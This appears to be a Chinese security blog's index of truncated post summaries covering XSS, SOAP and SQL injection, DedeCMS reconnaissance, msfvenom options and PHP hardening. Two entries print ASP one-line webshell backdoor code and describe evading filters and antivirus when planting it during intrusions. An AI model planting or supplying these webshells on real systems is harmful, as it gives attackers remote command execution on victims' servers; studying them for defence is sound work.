摘要： . AJAX中之跨站脚本攻击 例子， Yamanner蠕虫利用了Yahoo Mail的AJAX的跨站脚本漏洞，Samy蠕虫利用了MySpace.com的跨站脚本漏洞。2. XML 中毒(poisoning) 攻击者可以通过复制节点进行DOS攻击，或者生成不合法的XML导致服务器端逻辑的中断。攻击者也可以操纵外部实体，导致打开任何文件或TCP连接端口。XML数据定义的中毒也可以导致运行流程的改变，助攻击者获取机密信息。3. 运行恶意的AJAX编码 AJAX编码可以在不为用户所知的情形下运行，假如用户先登录一个机密网站，机密网站返回一个会话cookie，然后用户在没有退出机密网站的情形下，访问攻击 阅读全文

摘要： 在本文中，我们将要对SOAP服务中的一系列安全漏洞进行测试及利用。并不是所有的攻击行为都针对SOAP，我们必须对这一情况具备清醒的认识。这一行的新手往往有种先入为主的观念，认为威胁网页服务安全的各类攻击总带有一些神秘色彩并且超难阻止。但实际情况是，网页服务遭受的许多侵袭都源自与浏览器应用程序安全缺陷相类似的同一种漏洞。我们在本文中打算讲解并利用的漏洞类型分别为：1. SOAP 注入2. SQL 注入3. 默认内容4. 破损的认证及会话管理SOAP 注入虽然网页服务方面的许多安全缺陷都有相似之处或者几乎同样为大众所熟知，而且这些漏洞不仅被编纂成文供人们参考，甚至要将其真正利用起来也不需要什么高超 阅读全文

摘要： 在入侵过程中，我们常常会遇到这样的问题，因为大马太大，而不能上传，怎么办，这个时候就只能用小马来辅助，但是，小马的语句又被杀，今天我们来说说一句话小马的免杀方法。 众所周之，一句话的语句是<%execute request("密码")%> 1.入侵过程中<%,%>符号被过滤怎么办？我们可以想办法避开<%,%> <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 2.网络中流传的最小的木马代码是<%eva 阅读全文

摘要： 定义: 守护进程 daemon 是在后台运行不受终端控制的进程。启动方法：1. 很多守护进程是系统初始化脚本启动的，一般在/etc目录或者/etc/rc开头的目录2. 很多网络服务器是由inetd超级服务器启动的3. cron守护进程按规定的时间启动某个程序，可以把你的程序定个时间由他启动4. at命令制定某一时刻启动某个进程5. 也可以在用户终端启动，一般在测试守护进程或者守护进程需要重启时使用由于守护进程没有控制终端，所以他不能打印到终端上，当出现错误时，需要记录下来，就用到了下面这个函数；<syslog.h>void syslog(int priority, const ch 阅读全文

摘要： 放点原来的笔记，Mysql在执行语句的时候会抛出异常信息信息，而php+mysql架构的网站往往又将错误代码显示在页面上，这样可以通过构造如下三种方法获取特定数据。实际测试环境：?1234567mysql> show tables;+----------------+| Tables_in_test |+----------------+| admin || article |+----------------+?12345678mysql> describe admin;+-------+------------------+------+-----+---------+---- 阅读全文

摘要： 自己一直是编译安装，安装目录分配的很清楚，今天看到一个朋友的，发现自己不认识了，看了下是默认安装的，对默认安装的目录结构不熟悉，网上找了下，有朋友列的很清楚，自己摘录，留着自己用也方便~apache:如果采用RPM包安装，安装路径应在 /etc/httpd目录下apache配置文件:/etc/httpd/conf/httpd.confApache模块路径：/usr/sbin/apachectlweb目录:/var/www/html如果采用源代码安装，一般默认安装在/usr/local/apache2目录下php:如果采用RPM包安装，安装路径应在 /etc/目录下php的配置文件:/etc/p 阅读全文

摘要： 看了大家的小技巧，我也痒痒的厉害，我的技巧也是百度得到的。 ========================================= dedecms通过补丁号获得版本号的小技巧 dedecms通过注册用户知道版本小技巧 ========================================dede 默认安装时，会提示更改后台路径，如果我们不知道后台的话，有密码也没有用。使用默认路径去找找使用mysql_error 信息去试试哈哈。找到了view source1 具体代码：23 http://www.xx.com/www.91ri.org/data/mysql_error_t 阅读全文

摘要： Options: -p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled [length] Prepend a nopsled of [length] size on to the payload -f, --format [format] Format to output 阅读全文

摘要： asp一句话木马程序后门代码<%eval request("admin163")%>程序代码 <%execute request("admin163")%>程序代码 <%execute(request("admin163"))%>程序代码 <%execute request("admin163")%><%'<% loop <%:%>程序后门代码 <%'<% loop <%:%><%execute r 阅读全文

摘要： 通过启用php.ini配置文件中的相关选项，就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外。 开启magic_quote_gpc=on之后，能实现addslshes()和stripslashes()这两个函数的功能。在PHP4.0及以上的版本中，该选项默认情况下是开启的，所以在PHP4.0及以上的版本中，就算PHP程序中的参数没有进行过滤，PHP系统也会对每一个通过GET、POST、COOKIE方式传递的变量自动转换，换句话说，输入的注入攻击代码将会全部被转换，将给攻击者带来非常大的困难。 虽然如此，攻击者仍然有机会进行SQL注入攻击。。。。。。前提是，当参数为数字型的时候，且未经过Int 阅读全文